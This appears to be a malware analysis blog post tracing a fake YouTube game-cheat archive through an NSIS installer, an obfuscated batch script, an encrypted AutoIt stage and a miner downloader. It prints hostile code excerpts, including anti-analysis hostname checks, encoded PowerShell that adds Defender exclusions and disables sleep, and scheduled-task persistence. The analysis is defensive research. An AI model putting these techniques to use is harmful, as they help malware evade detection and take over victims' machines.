yet another youtube games cheat update
Another day, a few new channels, video uploads, and updates to malware download links later (not on Google, where the links remain online), a new version for deploying the final payload has appeared.
Laynch3r_Tool(v1.27).rar Archive
One of the new versions is the Laynch3r_Tool(v1.27).rar archive (SHA256: 512324DDA0B893CD2E61D7061BBB2A1832022F4D588B8B36D02062CF445416AC).
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 29/11/2024 15:03 apt
d---- 29/11/2024 15:04 binfmts
d---- 11/03/2025 17:33 gems
d---- 29/11/2024 15:07 ispell
d---- 01/09/2019 21:29 misc
d---- 29/11/2024 15:05 mlocate
d---- 29/11/2024 15:00 pam
d---- 29/11/2024 15:03 ucf
d---- 29/11/2024 14:59 usbutils
-a--- 11/04/2012 00:15 7174216 agcore1.dll
-a--- 11/03/2025 17:31 134217723 L__Tool.exe
-a--- 06/07/2023 09:01 25640324 plugins.tut
-a--- 24/01/2025 14:07 51278143 safes.tut
-a--- 12/06/2020 08:41 4982272 System.Windows.dll
None of the files except L__Tool.exe (SHA256: E10B8BA80EDBD15983D71E55B11C70466DDD65621A4CC6C774DDF1F68E2E16B5) have been changed. Everything else in the archive can therefore be considered filler material to evade antivirus scanners and will be disregarded. Only the executable will be examined in more detail below.
L__Tool.exe Binary
Due to the file size, the initial assumption was that it might be a bloated file. Accordingly, I attempted to use the debloat tool by Squiblydoo to remove any filler material. Instead, the tool conveniently indicated that this was an NSIS installer and extracted all associated files. The extracted setup.nsis file describes what the installer does once executed. Besides several commands meant solely for bloating and evading antivirus detection, it contains some critical actions. One key action is the extraction of various vsdx files from the installer (debloat did extract them too for easy analysis).
4F EXTRACTFILE $05000090, 'Smile.vsdx', $000E01E8, $FFFFFFFF, $FFFFFFFF, $FFFFFFD9
62 ASSIGNVAR 5, ' expand Smile.vs', 0, 0
73 ASSIGNVAR 4, 'x Smile.vsdx.bat', 0, 0
78 SHELLEXEC 'open', '$SHELL:SYSDIR\\cmd.exe', '/c$V5d$V4 & Smile.vsdx.bat', 0, $0500, 'open $SHELL:SYSDIR\\cmd.exe'
Most of the files are not used (yet), with the only one being used in the script being Smile.vsdx (SHA256: E00561A394A08CE872FC8B24257DE445A5BB2BA2D91A6DB2005F27398B0761EC). Interestingly, this file is not actually a Visio file but an obfuscated batch script. Additionally, two variables (4 & 5) are assigned values that are later combined into a command by inserting the character d between them. This results in the final command being executed via cmd: expand Smile.vsdx Smile.vsdx.bat & Smile.vsdx.bat, which appends the .bat extension to the file and then runs the script.
Smile.vsdx.bat Script
In this obfuscated script, several commands are composed from variables and executed.
For example, some parts of the archive file named Ebook.vsdx are extracted, which are then assembled into a binary called Monetary.com. This binary turns out to be the AutoIt v3 interpreter. Furthermore, other seemingly Visio files extracted by the installer are combined into an encrypted AutoIt script called D, located in the 802867 subfolder.
extrac32 /Y /E Ebook.vsdx
cmd /c copy /b 802867\Monetary.com + Concentrate + Tc + Emily + Mandate + Wp + Pb + Confirmation + Cruz + Did + Context 802867\Monetary.com
cmd /c copy /b ..\Texts.vsdx + ..\Conservative.vsdx + ..\Ebony.vsdx + ..\Finds.vsdx + ..\Unit.vsdx + ..\Closer.vsdx + ..\Contractor.vsdx + ..\Literature.vsdx D
start Monetary.com D
This AutoIt script (SHA256: C6376008DF4F0519E7C4D24F5FFAC73C21BA68816F98CC9F10393C7542D010D7) is then executed via start command and the Monetary.com binary. A very similar approach has been described by Trend Micro in their blog post.
D Encrypted AutoIt Script
Utilizing the myAut2Exe decompiler, I was able to revert this script to an au3 script and make it readable. This resulted in an obfuscated file with a lot of unnecessary filler loops and function calls.The core of the obfuscated code is an encryption function (FLYCHANGELOG) that is used hundreds of times throughout the script. Therefore, the first goal was to reverse this function, for further decrypting the script.
FUNC FLYCHANGELOG($POSINGOLIVE,$CONTINUEDRACHEL)
$MICROWAVERENEWABLE=""
$SAYINGACKNOWLEDGE=CALL(STRINGREVERSE("tilpSgnirtS"),$POSINGOLIVE,"B",2)
FOR $PANICPARTICULARLY=386-386 TO CALL("UBound",$SAYINGACKNOWLEDGE)-1
$MICROWAVERENEWABLE&=CHRW($SAYINGACKNOWLEDGE[$PANICPARTICULARLY]-$CONTINUEDRACHEL)
NEXT
RETURN $MICROWAVERENEWABLE
ENDFUNC
This is a simple function that splits every string passed to it at the character B and shifts it by a magic number. A simple reverse function in Python, along with a test value from the script, looks as follows:
def decrypt(encrypted_input, magic_number):
decrypted = ""
encrypted = list(map(int, encrypted_input.split("B")))
for character in encrypted:
decrypted += chr(character - magic_number)
return decrypted
decoded_string = decrypt("104B123B115B111B114B117B104B117B49B104B123B104", 3)
print(decoded_string) # explorer.exe
After decrypting the strings, further obfuscation methods are found (e.g., hundreds of while loops with switch-case statements) that attempt to hide the script’s contents. Among other things, the script checks the computer name and username and terminates under certain conditions (e.g., if the computer name is tz, NfZtFbPfH, or ELICZ, or if the username is test22 — some well known names of antivirus analysis hosts, as noted in this blog post by CrowdStrike).
(CALL(EnvGet,COMPUTERNAME)=tz)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
(CALL(EnvGet,COMPUTERNAME)=NfZtFbPfH)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
(CALL(EnvGet,COMPUTERNAME)=ELICZ)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
(CALL(EnvGet,USERNAME)=test22)(CALL(WinClose,CALL(AutoItWinGetTitle)))(OPT(TrayIconHide,1))
Additionally, the system checks whether it is running on a 64-bit architecture and has the ability to load different binaries depending on the system type. In this case, only one binary (stored in the $SJUCASMNE variable) is available for 64-bit systems. It is decompressed and loaded using ntdll.dll. Overall, this is the result of packing the payload with the CypherIT Packer/Crypter.
Final Payload
As the final payload following the infostealer activities, a well-known miner downloader named Task32Main.exe is executed to prepare the system for further cryptomining. Within the .NET application, PowerShell is used to add various exclusions and to prevent the system from entering standby mode.
string arguments = " /C powershell -EncodedCommand \"" + Convert.ToBase64String(Encoding.Unicode.GetBytes(string.Concat(new string[]
{
"<#",
Fregat.RS(Fregat.rnd.Next(2, 12), true),
"#> Add-MpPreference <#",
Fregat.RS(Fregat.rnd.Next(2, 12), true),
"#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#",
Fregat.RS(Fregat.rnd.Next(2, 12), true),
"#> -Force <#",
Fregat.RS(Fregat.rnd.Next(2, 12), true),
"#>"
}))) + "\" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off";
Process.Start(new ProcessStartInfo("cmd.exe")
{
Arguments = arguments,
UseShellExecute = false,
CreateNoWindow = true,
WindowStyle = ProcessWindowStyle.Hidden,
Verb = "runas"
});
Additionally, this loader ensures persistence by creating scheduled tasks within the AutoStart function, which execute the corresponding files loaded through the DAF function.
public static string string_2 = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\" + "Dllhost\\";
processStartInfo.Arguments = string.Concat(new string[] {
" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN \"",
"dllhost",
"\" /TR \"",
Fregat.string_2,
"dllhost.exe\""
});
string[] array3 = new string[] {
"NvStray"
};
processStartInfo.Arguments = string.Concat(new string[] {
" /c SCHTASKS /CREATE /SC HOURLY /TN \"",
"NvStray",
"\\",
"NvStray",
"Service_bk",
Convert.ToString(random.Next(10000)),
"\" /TR \"",
Fregat.string_2,
"dllhost.exe\""
});
Further details on this (well-known) approach and more in-depth descriptions of the miner watchdog can also be found in the blog post by Fortinet.